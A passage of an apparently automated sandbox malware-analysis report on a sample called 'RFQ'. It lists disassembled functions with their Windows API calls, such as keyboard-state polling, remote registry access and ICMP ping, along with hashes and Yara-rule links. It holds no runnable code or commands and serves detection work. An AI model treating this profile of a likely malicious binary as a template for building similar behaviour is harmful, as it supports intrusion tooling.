                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: SendString$_wcslen
                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                            • API String ID: 2420728520-1007645807
                                                                            • Opcode ID: f0500c2ecc1d19fabf93b797333ab78e8f638a50745552779f8669670b365150
                                                                            • Instruction ID: 234ade1c0bd4cef8509eaa7f181374d8da2831c872ca1286c2f3fc84fd54f4d8
                                                                            • Opcode Fuzzy Hash: f0500c2ecc1d19fabf93b797333ab78e8f638a50745552779f8669670b365150
                                                                            • Instruction Fuzzy Hash: 2211A371A9125979D760B7A68C4AEFF6F7DEBD2B40F00042D7401A20D1EFB05945C6B1
                                                                            Function 006E5C1C Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000001), ref: 006E5C38
                                                                            • GetWindowRect.USER32(00000000,?), ref: 006E5C51
                                                                            • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 006E5CAF
                                                                            • GetDlgItem.USER32(?,00000002), ref: 006E5CBF
                                                                            • GetWindowRect.USER32(00000000,?), ref: 006E5CD1
                                                                            • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 006E5D25
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 006E5D33
                                                                            • GetWindowRect.USER32(00000000,?), ref: 006E5D45
                                                                            • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 006E5D87
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 006E5D9A
                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 006E5DB0
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 006E5DBD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                            • String ID:
                                                                            • API String ID: 3096461208-0
                                                                            • Opcode ID: 0beb0cb5ef0b81c6bde8133bd53985ecbabc6abbad337dc71cecdd24525a338b
                                                                            • Instruction ID: 1a822781213e0fa0f21788b22189ece842dccf35ee874f1f303bf1a0803df9ae
                                                                            • Opcode Fuzzy Hash: 0beb0cb5ef0b81c6bde8133bd53985ecbabc6abbad337dc71cecdd24525a338b
                                                                            • Instruction Fuzzy Hash: 44511E70A41705AFDB09CFA9CD99AEEBBB6FF48704F108129F916E6290D7749D008B54
                                                                            Function 0069A142 Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0069A4D7: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0069A15D,?,00000000,?,?,?,?,0069A12F,00000000,?), ref: 0069A53A
                                                                            • DestroyWindow.USER32(?), ref: 0069A1F6
                                                                            • KillTimer.USER32(00000000,?,?,?,?,0069A12F,00000000,?), ref: 0069A290
                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 006D73C6
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0069A12F,00000000,?), ref: 006D73F4
                                                                            • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0069A12F,00000000,?), ref: 006D740B
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0069A12F,00000000), ref: 006D7427
                                                                            • DeleteObject.GDI32(00000000), ref: 006D7439
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 641708696-0
                                                                            • Opcode ID: bb12d0c373ebbe34f4f80cdae9a39bf2b8e9fe1464f9f7e69f783f086e10a306
                                                                            • Instruction ID: 41fb65b1c0416b280b5a1039fcba9e1dde2c983145479a18437b567d969f0f50
                                                                            • Opcode Fuzzy Hash: bb12d0c373ebbe34f4f80cdae9a39bf2b8e9fe1464f9f7e69f783f086e10a306
                                                                            • Instruction Fuzzy Hash: D0617C31505700DFCF269F98D948BA97BF6FB40312F158519E44287AA0C3B9BD90DBCA
                                                                            Function 0069ACB8 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0069ADC4: GetWindowLongW.USER32(?,000000EB), ref: 0069ADD2
                                                                            • GetSysColor.USER32(0000000F), ref: 0069ACE2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ColorLongWindow
                                                                            • String ID:
                                                                            • API String ID: 259745315-0
                                                                            • Opcode ID: 52f30f44c424bc71eddcb2ccf5d92e9c9c2db24d41fd47a7a68b6366bd421c5f
                                                                            • Instruction ID: 190557912a6fd1d447d85721a1d10dba50e2dcb8032045aaa23b7285ee6eaa79
                                                                            • Opcode Fuzzy Hash: 52f30f44c424bc71eddcb2ccf5d92e9c9c2db24d41fd47a7a68b6366bd421c5f
                                                                            • Instruction Fuzzy Hash: E841BE71144644AFDF215BACDC48BF937EBAF02322F148605F9A28BAE1D7349C46DB52
                                                                            Function 006E9600 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,006D03D3,?,0000138C,?,?,?,?,00000000,?), ref: 006E9635
                                                                            • LoadStringW.USER32(00000000,?,006D03D3,?), ref: 006E963E
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,006D03D3,?,0000138C,?,?,?,?,00000000,?,?), ref: 006E9660
                                                                            • LoadStringW.USER32(00000000,?,006D03D3,?), ref: 006E9663
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 006E9784
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Message_wcslen
                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                            • API String ID: 747408836-2268648507
                                                                            • Opcode ID: 16ab527eb00951cf5eeabec002cf03acc63ab7f663fead1d8fae026ac2465778
                                                                            • Instruction ID: f31910811d2ba3cd65f59882edd5e3ba9ec7ca239b5874b8da14cd1ce0313169
                                                                            • Opcode Fuzzy Hash: 16ab527eb00951cf5eeabec002cf03acc63ab7f663fead1d8fae026ac2465778
                                                                            • Instruction Fuzzy Hash: 90416E72801209AACF44FFE5CD96DEE777AAF15300F100129F50276092EB786F49CB69
                                                                            Function 006E05C7 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006884E7: _wcslen.LIBCMT ref: 006884FA
                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006E068B
                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006E06A7
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006E06C3
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 006E06ED
                                                                            • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 006E0715
                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 006E0720
                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 006E0725
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                            • API String ID: 323675364-22481851
                                                                            • Opcode ID: 44f6edbc548e615ce66bbdaffe032166f3354b6d6293e63a6a96e013f960f7f0
                                                                            • Instruction ID: bd63f201dba3c4d66f95a81b33e6a21186668a7d5fd9287be2306b12a8d3d95e
                                                                            • Opcode Fuzzy Hash: 44f6edbc548e615ce66bbdaffe032166f3354b6d6293e63a6a96e013f960f7f0
                                                                            • Instruction Fuzzy Hash: 57410672811229ABDF11EBE4DC959EEB7B9BF14350F008129E805A72A1EB749E44CF64
                                                                            Function 00703B57 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 00703B83
                                                                            • CoInitialize.OLE32(00000000), ref: 00703BB1
                                                                            • CoUninitialize.OLE32 ref: 00703BBB
                                                                            • _wcslen.LIBCMT ref: 00703C54
                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00703CD8
                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00703DFC
                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00703E35
                                                                            • CoGetObject.OLE32(?,00000000,0071FBB4,?), ref: 00703E54
                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00703E67
                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00703EEB
                                                                            • VariantClear.OLEAUT32(?), ref: 00703EFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                            • String ID:
                                                                            • API String ID: 429561992-0
                                                                            • Opcode ID: 3a3bb3d345e830ae8e4d1ffaf25a23809389cf06ba81b60dbb49ac2b1830fb2b
                                                                            • Instruction ID: f4f375e8c478ca461de4b7dd547089b6c5e166dbe2823545328170c785ed2ba4
                                                                            • Opcode Fuzzy Hash: 3a3bb3d345e830ae8e4d1ffaf25a23809389cf06ba81b60dbb49ac2b1830fb2b
                                                                            • Instruction Fuzzy Hash: E7C125B1604205EFD700DF68C88496BBBE9FF89748F104A1DF5899B290DB75EE05CB52
                                                                            Function 006F79B4 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 006F7A11
                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006F7AAD
                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 006F7AC1
                                                                            • CoCreateInstance.OLE32(0071FD24,00000000,00000001,00746E7C,?), ref: 006F7B0D
                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006F7B92
                                                                            • CoTaskMemFree.OLE32(?,?), ref: 006F7BEA
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 006F7C75
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006F7C98
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 006F7C9F
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 006F7CF4
                                                                            • CoUninitialize.OLE32 ref: 006F7CFA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                            • String ID:
                                                                            • API String ID: 2762341140-0
                                                                            • Opcode ID: ab805aec1c77ccdc7e643c5021e3381a66003280b9bfc08372025f4dff03f7f9
                                                                            • Instruction ID: a63c40489c0174612ea1ff789bbf917840e1b9808e5f58a74f717e72b1893cb8
                                                                            • Opcode Fuzzy Hash: ab805aec1c77ccdc7e643c5021e3381a66003280b9bfc08372025f4dff03f7f9
                                                                            • Instruction Fuzzy Hash: 65C12C75A04109AFCB14DFA4C898DAEBBF6FF48304B148598E916DB361DB30EE45CB94
                                                                            Function 00715352 Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00715439
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0071544A
                                                                            • CharNextW.USER32(00000158), ref: 00715479
                                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007154BA
                                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007154D0
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007154E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CharNext
                                                                            • String ID:
                                                                            • API String ID: 1350042424-0
                                                                            • Opcode ID: a1198e5a56e2583db7dc9ace216c197a694589195dfbeb6e58eceb9b213bda3f
                                                                            • Instruction ID: 15782578f9a8c617ffb5fea45d4e66068b51510e6f04c448b39b539ca1c8502f
                                                                            • Opcode Fuzzy Hash: a1198e5a56e2583db7dc9ace216c197a694589195dfbeb6e58eceb9b213bda3f
                                                                            • Instruction Fuzzy Hash: 32619E70900608EFDB198F98CC84EFE7BB9EB85755F108149F925A72D0C7789AC1CB60
                                                                            Function 006DF971 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 006DF998
                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 006DF9F1
                                                                            • VariantInit.OLEAUT32(?), ref: 006DFA03
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 006DFA23
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 006DFA76
                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 006DFA8A
                                                                            • VariantClear.OLEAUT32(?), ref: 006DFA9F
                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 006DFAAC
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006DFAB5
                                                                            • VariantClear.OLEAUT32(?), ref: 006DFAC7
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006DFAD2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                            • String ID:
                                                                            • API String ID: 2706829360-0
                                                                            • Opcode ID: ae44238ecfcce37e12e170ed37d05bb95a6c21d7b727775d6b1fdfffd1437755
                                                                            • Instruction ID: 3fcf287f531a9c24cab61ab5bdefe1b50f0e05e4224d91769a4fb006b3856b36
                                                                            • Opcode Fuzzy Hash: ae44238ecfcce37e12e170ed37d05bb95a6c21d7b727775d6b1fdfffd1437755
                                                                            • Instruction Fuzzy Hash: 0A415F75E00219EFCB01DFA8D8549ED7BB9EF48344F04C029E946AB361D734A945CBA4
                                                                            Function 006E9B97 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 006E9BBF
                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 006E9C40
                                                                            • GetKeyState.USER32(000000A0), ref: 006E9C5B
                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 006E9C75
                                                                            • GetKeyState.USER32(000000A1), ref: 006E9C8A
                                                                            • GetAsyncKeyState.USER32(00000011), ref: 006E9CA2
                                                                            • GetKeyState.USER32(00000011), ref: 006E9CB4
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 006E9CCC
                                                                            • GetKeyState.USER32(00000012), ref: 006E9CDE
                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 006E9CF6
                                                                            • GetKeyState.USER32(0000005B), ref: 006E9D08
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: e32f3ed1f275f297a25a4543991d746bd856b106fc51b431b7f66a861bdad172
                                                                            • Instruction ID: 00bac1c2fb24b9672fa82a1af6002b4c7b765b0d81dcf0462d35567013c8e86d
                                                                            • Opcode Fuzzy Hash: e32f3ed1f275f297a25a4543991d746bd856b106fc51b431b7f66a861bdad172
                                                                            • Instruction Fuzzy Hash: AB410770505BCA6DFF31A76688043F6BEE26F12744F24805AC6C6577C2EBA499C8C772
                                                                            Function 006E4179 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 239COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(0071D0D0,?,?), ref: 006E4212
                                                                              • Part of subcall function 006E3F58: CharUpperBuffW.USER32(?,?,00000000,0071D0D0,?,?,00000001,?,?,006E4286,?,?,?,?,00000000,0071D0D0), ref: 006E3FE5
                                                                            • _wcslen.LIBCMT ref: 006E4296
                                                                            • _wcslen.LIBCMT ref: 006E42F0
                                                                            • _wcslen.LIBCMT ref: 006E4337
                                                                            • _wcslen.LIBCMT ref: 006E437B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$BuffCharForegroundUpperWindow
                                                                            • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                            • API String ID: 1486467469-1994484594
                                                                            • Opcode ID: 9f857e8738e6a869fa87b33300861eb1f4ee357e80b52f47711b8fcf350c932d
                                                                            • Instruction ID: 63dbff9946ac2e03df9268e9ad88642bcf424f9f1dec0c1f2aa5c034b3706b12
                                                                            • Opcode Fuzzy Hash: 9f857e8738e6a869fa87b33300861eb1f4ee357e80b52f47711b8fcf350c932d
                                                                            • Instruction Fuzzy Hash: 8981E132A053929BCB14EF7AC8945AAB3E3BF95310B50462DF456D7680EF30EE458B91
                                                                            Function 00700482 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 007004E3
                                                                            • inet_addr.WSOCK32(?), ref: 00700543
                                                                            • gethostbyname.WSOCK32(?), ref: 0070054F
                                                                            • IcmpCreateFile.IPHLPAPI ref: 0070055D
                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007005ED
                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0070060C
                                                                            • IcmpCloseHandle.IPHLPAPI(?), ref: 007006E0
                                                                            • WSACleanup.WSOCK32 ref: 007006E6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                            • String ID: Ping
                                                                            • API String ID: 1028309954-2246546115
                                                                            • Opcode ID: 5c71c6ebcd3547e7c7df2e652d3e5320c88f38bcde7957f10553b9eb303a1465
                                                                            • Instruction ID: 64d68774b30cf450f77b5d93e38f1cdb5a78f9e812efd295e1da91922fe3161a
                                                                            • Opcode Fuzzy Hash: 5c71c6ebcd3547e7c7df2e652d3e5320c88f38bcde7957f10553b9eb303a1465
                                                                            • Instruction Fuzzy Hash: 3291AD70604201EFD720DF19C888F16BBE1AF85328F1586A9E4698B6E2C739ED55CFD1
                                                                            Function 00708BFA Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
